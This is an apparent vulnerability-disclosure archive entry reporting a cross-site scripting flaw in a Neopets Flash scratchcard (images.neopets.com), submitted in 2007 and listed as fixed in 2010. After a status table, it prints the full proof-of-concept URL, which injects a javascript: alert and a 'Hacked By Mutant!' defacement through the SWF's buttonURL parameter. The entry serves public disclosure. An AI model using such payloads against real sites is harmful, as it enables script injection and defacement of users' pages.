Security researcher Mutant submitted a cross-site scripting (XSS) vulnerability affecting images.neopets.com on 21/09/2007; at the time of submission the domain ranked 155 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 28/09/2007. It is currently fixed.
| Date submitted | Date published | Date fixed | Status |
|---|---|---|---|
| 21/09/2007 | 28/09/2007 | 13/07/2010 | FIXED |

| Author | Domain | Category | Pagerank |
|---|---|---|---|
| Mutant | images.neopets.com | XSS | 155 |
 
 
URL: http://images.neopets.com/scratchcard_v23.swf?joe=bob&random=392785&matchesNeededToWin=3&zonesScratchableMax=6&startText=%3Cfont+color%3D%22%23000000%22%3EScratch+off+6+boxes+to+see+XSS%21%3C%2Ffont%3E&loadingText=&bgSWFURL=http://images.neopets.com/desert/desert_sc/sc_bg_sco.swf&endText=%3Cfont+color%3D%22%23009999%22%3EClick+below+to+see+XSS.%21%3C%2Ffont%3E&buttonText=%3Cfont+color%3D%22%23009999%22%3EClick+Here+To+See+XSS%21%3C%2Ffont%3E&buttonURL=javascript:document.write("<script>alert('j00 g0t 0wn3d!')</script><p align=center><h1>Hacked By Mutant!");&scratchSWFURL1=desert_item3_v1_mc&scratchSWFURL2=desert_item4_v1_mc&scratchSWFURL3=desert_item5_v1_mc&scratchSWFURL4=desert_item6_v1_mc&scratchSWFURL5=desert_item6_v1_mc&scratchSWFURL6=desert_item8_v1_mc&scratchSWFURL7=desert_item9_v1_mc&scratchSWFURL8=desert_item10_v1_mc&scratchSWFURL9=desert_item11_v1_mc&winner=1&lang=en&forceStartText=%3Cbr%3E%3Ca+href%3D%22asfunction%3AforceStart%22%3E-+Click+Here+to+Start+-%3C%2Fa%3E&beginEachScratchURL=http%3A%2F%2Fwww.neopets.com%2Fdesert%2Fsc%2Fscratch_update.phtml%3Fcard_level%3D1%26username%3Dnonespecified',%20'flash_97505124257',%20'550',%20'400',%20'6',%20'#FFFFFF